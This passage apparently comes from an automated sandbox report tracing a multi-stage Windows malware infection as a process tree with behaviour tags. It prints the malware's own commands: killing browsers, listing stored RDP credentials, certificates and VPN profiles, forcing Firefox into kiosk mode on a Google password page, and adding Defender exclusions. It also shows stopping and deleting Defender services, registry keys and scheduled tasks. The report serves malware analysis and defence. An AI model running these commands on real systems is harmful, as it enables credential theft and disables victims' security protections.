        6⤵
        Kills process with taskkill
        
        PID:7604
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:3512
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        6⤵
        
        PID:7708
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        6⤵
        
        PID:4388
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        6⤵
        
        PID:8036
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        6⤵
        Kills process with taskkill
        
        PID:7660
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        6⤵
        
        PID:556
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:7988
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        
        PID:5604
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:4384
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        6⤵
        Kills process with taskkill
        
        PID:1500
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        6⤵
        Kills process with taskkill
        
        PID:5248
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:2008
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        6⤵
        
        PID:1336
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        6⤵
        Kills process with taskkill
        
        PID:696
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        6⤵
        Kills process with taskkill
        
        PID:6392
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:7452
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        6⤵
        Kills process with taskkill
        
        PID:1092
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6496
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        6⤵
        Kills process with taskkill
        
        PID:6620
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        6⤵
        Kills process with taskkill
        
        PID:7196
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        6⤵
        Kills process with taskkill
        
        PID:5348
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6152
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        6⤵
        
        PID:6432
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6784
      - C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        6⤵
        
        PID:6824
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:6920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6848
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        7⤵
        
        PID:7444
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        6⤵
        
        PID:5856
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        6⤵
        
        PID:1108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        
        PID:3324
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:6308
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        6⤵
        
        PID:6544
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        6⤵
        
        PID:7860
      - C:\Windows\system32\hostname.exe
        
        "hostname"
        6⤵
        
        PID:3680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1696
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        6⤵
        
        PID:7316
      - C:\Windows\system32\netsh.exe
        
        "netsh" advfirewall show allprofiles state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5232
    - - C:\Users\Admin\AppData\Local\Temp\10416740101\a1c5de4625.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416740101\a1c5de4625.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5320
    - - C:\Users\Admin\AppData\Local\Temp\10416750101\5e4bf76d9c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416750101\5e4bf76d9c.exe"
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2984
    - - C:\Users\Admin\AppData\Local\Temp\10416760101\b6c719608f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416760101\b6c719608f.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4160
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:5408
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6020
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:664
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2596
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4280
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:2984
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2024 -prefsLen 27099 -prefMapHandle 2028 -prefMapSize 270279 -ipcHandle 2116 -initialChannelId {c7c7e000-2800-4530-a473-93c64ac1be3d} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        8⤵
        
        PID:2284
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2532 -prefsLen 27135 -prefMapHandle 2536 -prefMapSize 270279 -ipcHandle 2540 -initialChannelId {aec0f3b6-98f4-4065-b0ff-399ea8a1cc6a} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        8⤵
        Checks processor information in registry
        
        PID:4900
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3960 -prefsLen 25164 -prefMapHandle 3964 -prefMapSize 270279 -jsInitHandle 3968 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3976 -initialChannelId {5ee3d09b-cf22-4157-b43d-1be2ca924598} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        8⤵
        Checks processor information in registry
        
        PID:2940
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4128 -prefsLen 27276 -prefMapHandle 4132 -prefMapSize 270279 -ipcHandle 4200 -initialChannelId {da5fb70e-5a2e-4153-bf8d-a4c02bd8ced8} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        8⤵
        
        PID:5764
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3196 -prefsLen 34775 -prefMapHandle 3080 -prefMapSize 270279 -jsInitHandle 3172 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3328 -initialChannelId {ec13f828-347c-497c-adfa-19ea3f85e8f9} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        8⤵
        Checks processor information in registry
        
        PID:452
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5204 -prefsLen 35012 -prefMapHandle 5208 -prefMapSize 270279 -ipcHandle 2736 -initialChannelId {f5aa5e3e-6054-461a-ae16-c01b85f66d41} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        8⤵
        Checks processor information in registry
        
        PID:7784
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5356 -prefsLen 32952 -prefMapHandle 5360 -prefMapSize 270279 -jsInitHandle 5364 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5164 -initialChannelId {14c3564a-335b-434e-b1a3-e2fd456b3410} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        8⤵
        Checks processor information in registry
        
        PID:7856
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5624 -prefsLen 32952 -prefMapHandle 5628 -prefMapSize 270279 -jsInitHandle 5632 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5608 -initialChannelId {2b42f49e-a6d3-4080-a7f0-fccaf5a24072} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        8⤵
        Checks processor information in registry
        
        PID:7880
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5808 -prefsLen 32952 -prefMapHandle 5812 -prefMapSize 270279 -jsInitHandle 5816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5820 -initialChannelId {37497e80-e15e-4d5f-ad61-02b4f0df1cfd} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        8⤵
        Checks processor information in registry
        
        PID:7900
    - - C:\Users\Admin\AppData\Local\Temp\10416770101\58424ecd61.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416770101\58424ecd61.exe"
        5⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1528
    - - C:\Users\Admin\AppData\Local\Temp\10416780101\8938ff0d0d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416780101\8938ff0d0d.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7276
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7336
    - - C:\Users\Admin\AppData\Local\Temp\10416790101\8e5094a924.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416790101\8e5094a924.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7480
    - - C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4628
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5460
    - - C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:220
    - - C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5716
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:7784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5828
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:4652
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:7840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:13272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        
        PID:7976
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:8032
        
        C:\Users\Admin\AppData\Local\Temp\{b4016db7-0f75-43ad-80c4-976ac0755d04}\43a434f6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{b4016db7-0f75-43ad-80c4-976ac0755d04}\43a434f6.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\{0656fd96-0fa0-49b4-8cf8-5aba626cf27c}\c6570e3e.exe
        
        C:/Users/Admin/AppData/Local/Temp/{0656fd96-0fa0-49b4-8cf8-5aba626cf27c}/\c6570e3e.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:12888
    - - C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7044
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4844
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5856
    - - C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4748
      - C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7756
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD2E.tmp\CD3F.tmp\CD40.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7288
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CE19.tmp\CE1A.tmp\CE1B.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        9⤵
        
        PID:5316
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:4152
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:2652
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:6356
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:3964
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:7920
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7548
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3472
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:7492
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:5368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:6980
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:5044
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:6036
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:3780
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:7280
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:1596
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:7336
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:396
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:696
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:5828
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:7972
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:8224
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:8680
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:8720
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:8752
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:8784
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:8812
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:8848
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:8868
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:8892
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:8928
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:8976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:9004
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:9044
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:9088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:1636
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:9148
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:9196
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:1940
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:9256
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:9296
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:6392
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:9360
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:9392
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:9428
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:9452
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:9496
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:9536
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:9584
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:9632
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:9668
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:5176
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:9736
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:9772
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:9792
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:9840
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:6436
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:9984
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:5956
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:6408
    - - C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10844
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:10912
        
